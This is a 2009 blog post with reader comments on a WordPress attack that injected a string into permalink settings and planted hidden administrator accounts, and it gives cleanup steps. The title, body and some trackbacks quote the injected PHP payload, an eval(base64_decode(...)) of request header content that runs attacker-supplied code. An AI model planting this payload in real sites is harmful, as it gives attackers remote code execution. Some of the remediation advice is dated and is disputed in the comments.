UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

$UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/$

Hello there! If you are new here, you might want to subscribe to the RSS feed for updates on this topic.

Hey Guys,

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or a
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL

To fix things:

go to Setting->Permalinks and delete the above mean code

go to users, you will notice there are more administrators than usual

Put your mouse over the users and find the one that is last to register

Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.

You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
This should fix it. Don’t forget to upgrade your blog to the latest version.

Hope this helps everyone! You can also delete the hidden user from PHPMyAdmin directly from the database, whatever you are comfortable with.

UPDATE: Mashable has written about this issue here.

NEWEST UPDATE: WordPress Responds to Attacks

NEWEST UPDATE: OFFICIAL RESPONSE FROM WORDPRESS

Here are some other good posts on the topic and have other examples that may be more specific to your issue:

http://www.warriorforum.com/main-internet-marketing-discussion-forum/121131-wordpress-mysql-injection-latest-attack-eval-base64_decode-_server-http_referer.html

http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

If you like this, You'll love These.

About the Author

Andy Sowards

Im a professional Freelancer specializing in Web Developer, Design, Programming web applications. Im an Avid member of the Design/Development community and a Serial Blogger. follow me on Twitter @AndySowards

24 Responses to “UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/”

Reed Valladores November 9, 2011

How to insert Dynamic Drive codes and scripts on my Joomla site?

Reply
What I Learned from the Wordpress Worm September 9, 2009

[...] How to fix the WordPress Worm Related Posts:Client Profile: Relational Energy Healing with Dean RamsdenWordpress gets noticed by USA TodayNew Homepage Copy… Thanks to Tanisha RobinsonWordcamp Columbus coming May 16th to Columbus State Campus"Link Builders Pro" Review and Case Study: Bad Service, No Results [...]

Reply
Erste Hilfe Anleitung zum WordPress Wurm - WordPress-Zone September 9, 2009

[...] Andy Sowards hat eine kleine Anleitung dazu geschrieben, wie man sich dieser Probleme gezielt wieder entledigt. Diese ist allerdings in Englisch von daher werde ich diese soweit ins Deutsche übersetzen. Danksagungen gehen bitte also an Andy Sowards. [...]

Reply
WordPress under gpc_10805 attack | ShinePHP.com September 8, 2009

[...] http://www.andysowards.com/blog/wordpress/breaking-wordpress-mysql-injection-how-to-fix-latest-attac… http://www.seanrees.com/2009/09/02/well-an-update-worth-its-salt/ But pay attention that not only [...]

Reply
Dobschat » Montag = Telefontag September 7, 2009

[...] mit Abmahnungen auf Fehltritte – es gibt auch technische Gefahren, zum Beispiel mal wieder eine Attacke gegen alten WordPress-Versionen, wer also noch nicht die aktuellste Version eingespielt hat: spätestens jetzt wird es Zeit (selbst [...]

Reply
WICHTIG: Wordpress updaten- alte Versionen unter Beschuss!News » webwork-magazin.net September 7, 2009

[...] Eine englische Beschreibung des Problems, inklusive Anleitung zur Auffindung der versteckten Admins (Achtung oft sind es mehrere) findet sich hier. [...]

Reply
Mes favoris du 5-09-09 au 7-09-09 September 7, 2009

[...] Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_… – Cet article a été publié dans Delicious avec les mots-clefs : favoris. Bookmarker le permalien. Laisser un commentaire ou faire un trackback : URL de trackback. « Mes favoris du 3-09-09 au 4-09-09 [...]

Reply
Gaith September 6, 2009

I just deleted the users, but did not delete the user name with a weird code is that enough? also changed cpanel, db and wp passwords?

Reply
- Andy Sowards September 6, 2009
  
  Gaith, You don’t have to change your DB pw’s but that is also a good measure, however if you need help deleting the wordpress user from the `wp_users` table of the mysql database, this post has a good explanation of how to do that at the bottom of the post http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/
  
  Reply
Hacker attackieren ältere WordPress Versionen • Jiinx.net September 6, 2009

[...] für gehackt WordPress Blog’s. [...]

Reply
Ben September 6, 2009

Damn. My wordpress is up to date, there’s no extra junk in my permalinks settings and there’s no additional users. But all my links are stuffed. A;; the symptoms of the current bug. I can’t find any info anywhere other than to make sure it’s the latest version which it is. Don’t tell me I have to do a fresh install. Arrrrrggggh!

Reply
Ältere WordPress-Versionen Ziel von Angriffen - Nur die aktuellste Version von WordPress ist die sicherste, Nachtrag, Blog, WordPress, Angriffswelle, Lorelle - WordPress Deutschland Blog September 5, 2009

[...] Wer auf diese Art gehackt wurde, sollte folgenden Beitrag auf Andy Sowards Blog lesen. Danke an Sergej für diesen [...]

Reply
Angriffe auf ältere Wordpress-Versionen! | gedankenströme September 5, 2009

[...] Infos dazu gibt es auf dem WordPress Deutschland Blog oder bei Andy Sowards. Tags » Trackback: Trackback-URL | Feed zum Beitrag: RSS 2.0 [...]

Reply
Praxiswissen WordPress » Angriffswelle auf alte WordPress-Versionen September 5, 2009

[...] Hier noch ein Lösungsansatz von Andy Sowards, via wpSEO@twitter Veröffentlicht am 5. September 2009 um 17:59 von Adler Olivia · Permalink [...]

Reply
Shawn Plep September 5, 2009

Please be careful before spreading information that isn’t proven; it’s most likely that your system was compromised before your upgrade to 2.8.4. Have you looked at your server logs yet? Do you know when the compromise occurred, how it occurred, and which version of WP you were running at that time? THIS is the info we need before we can state which version of WP has a vulnerability.

Reply
- Andy Sowards September 5, 2009
  
  Shawn thanks for the concern but this is a widespread attack, see this post http://mashable.com/2009/09/05/wordpress-attack/
  
  I confirmed the validity of this post before posting this a whole day before mashable
  
  Reply
Vom Leben gebloggt… » Blog Archive » Hackangriff September 5, 2009

[...] ist dein Freund, spuckte sogleich die Lösung aus, die innerhalb weniger Sekunden umgesetzt war. Ich nehme das jetzt einfach mal als Anlass, mein [...]

Reply
Mark Jaquith September 5, 2009

This was fixed in a round-about way by WordPress 2.8.1

WordPress 2.8.4 is not vulnerable. It is, however, possible that you were compromised before upgrading, and they still have a user account or have placed an exploit file on your server to allow for ongoing access. Delete user accounts you don’t recognize, and remove foreign PHP files.

Reply
- Andy Sowards September 5, 2009
  
  Thanks Mark for chiming in with that info, That could have very well been what happened, Although the attackers must have been planning this for some time then, because there are countless blogs that were attacked the past day or so, Thanks for working hard to defend these attacks!
  
  Reply
WordPress SQL Injection - Latest Attack September 4, 2009

[...] blog posts URLs will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our [...]

Reply
Andy Sowards September 4, 2009

Yes you are correct, I read that as well, BUT Do not know if its 100% Accurate, if that is the case tho then wordpress will have to release 2.8.5 immediately, within the next week

Reply
Designrfix September 4, 2009

sadly none of these links provide a “fix”… it simply tells you how to scoop up the water flowing in with a tea spoon =/

Reply
- Andy Sowards September 4, 2009
  
  Yes unfortunately right now the only thing you can do is update to latest wordpress, and if that doesn’t provide a permanent fix, WordPress will most definitely release 2.8.5 immediately, I will update this post with the latest information
  
  Reply
  - Designrfix September 4, 2009
    
    hmmm thought i read the vuln. hits 2.8.4 also? (which is the latest) sorry if i’m wrong. can’t go back and check at the moment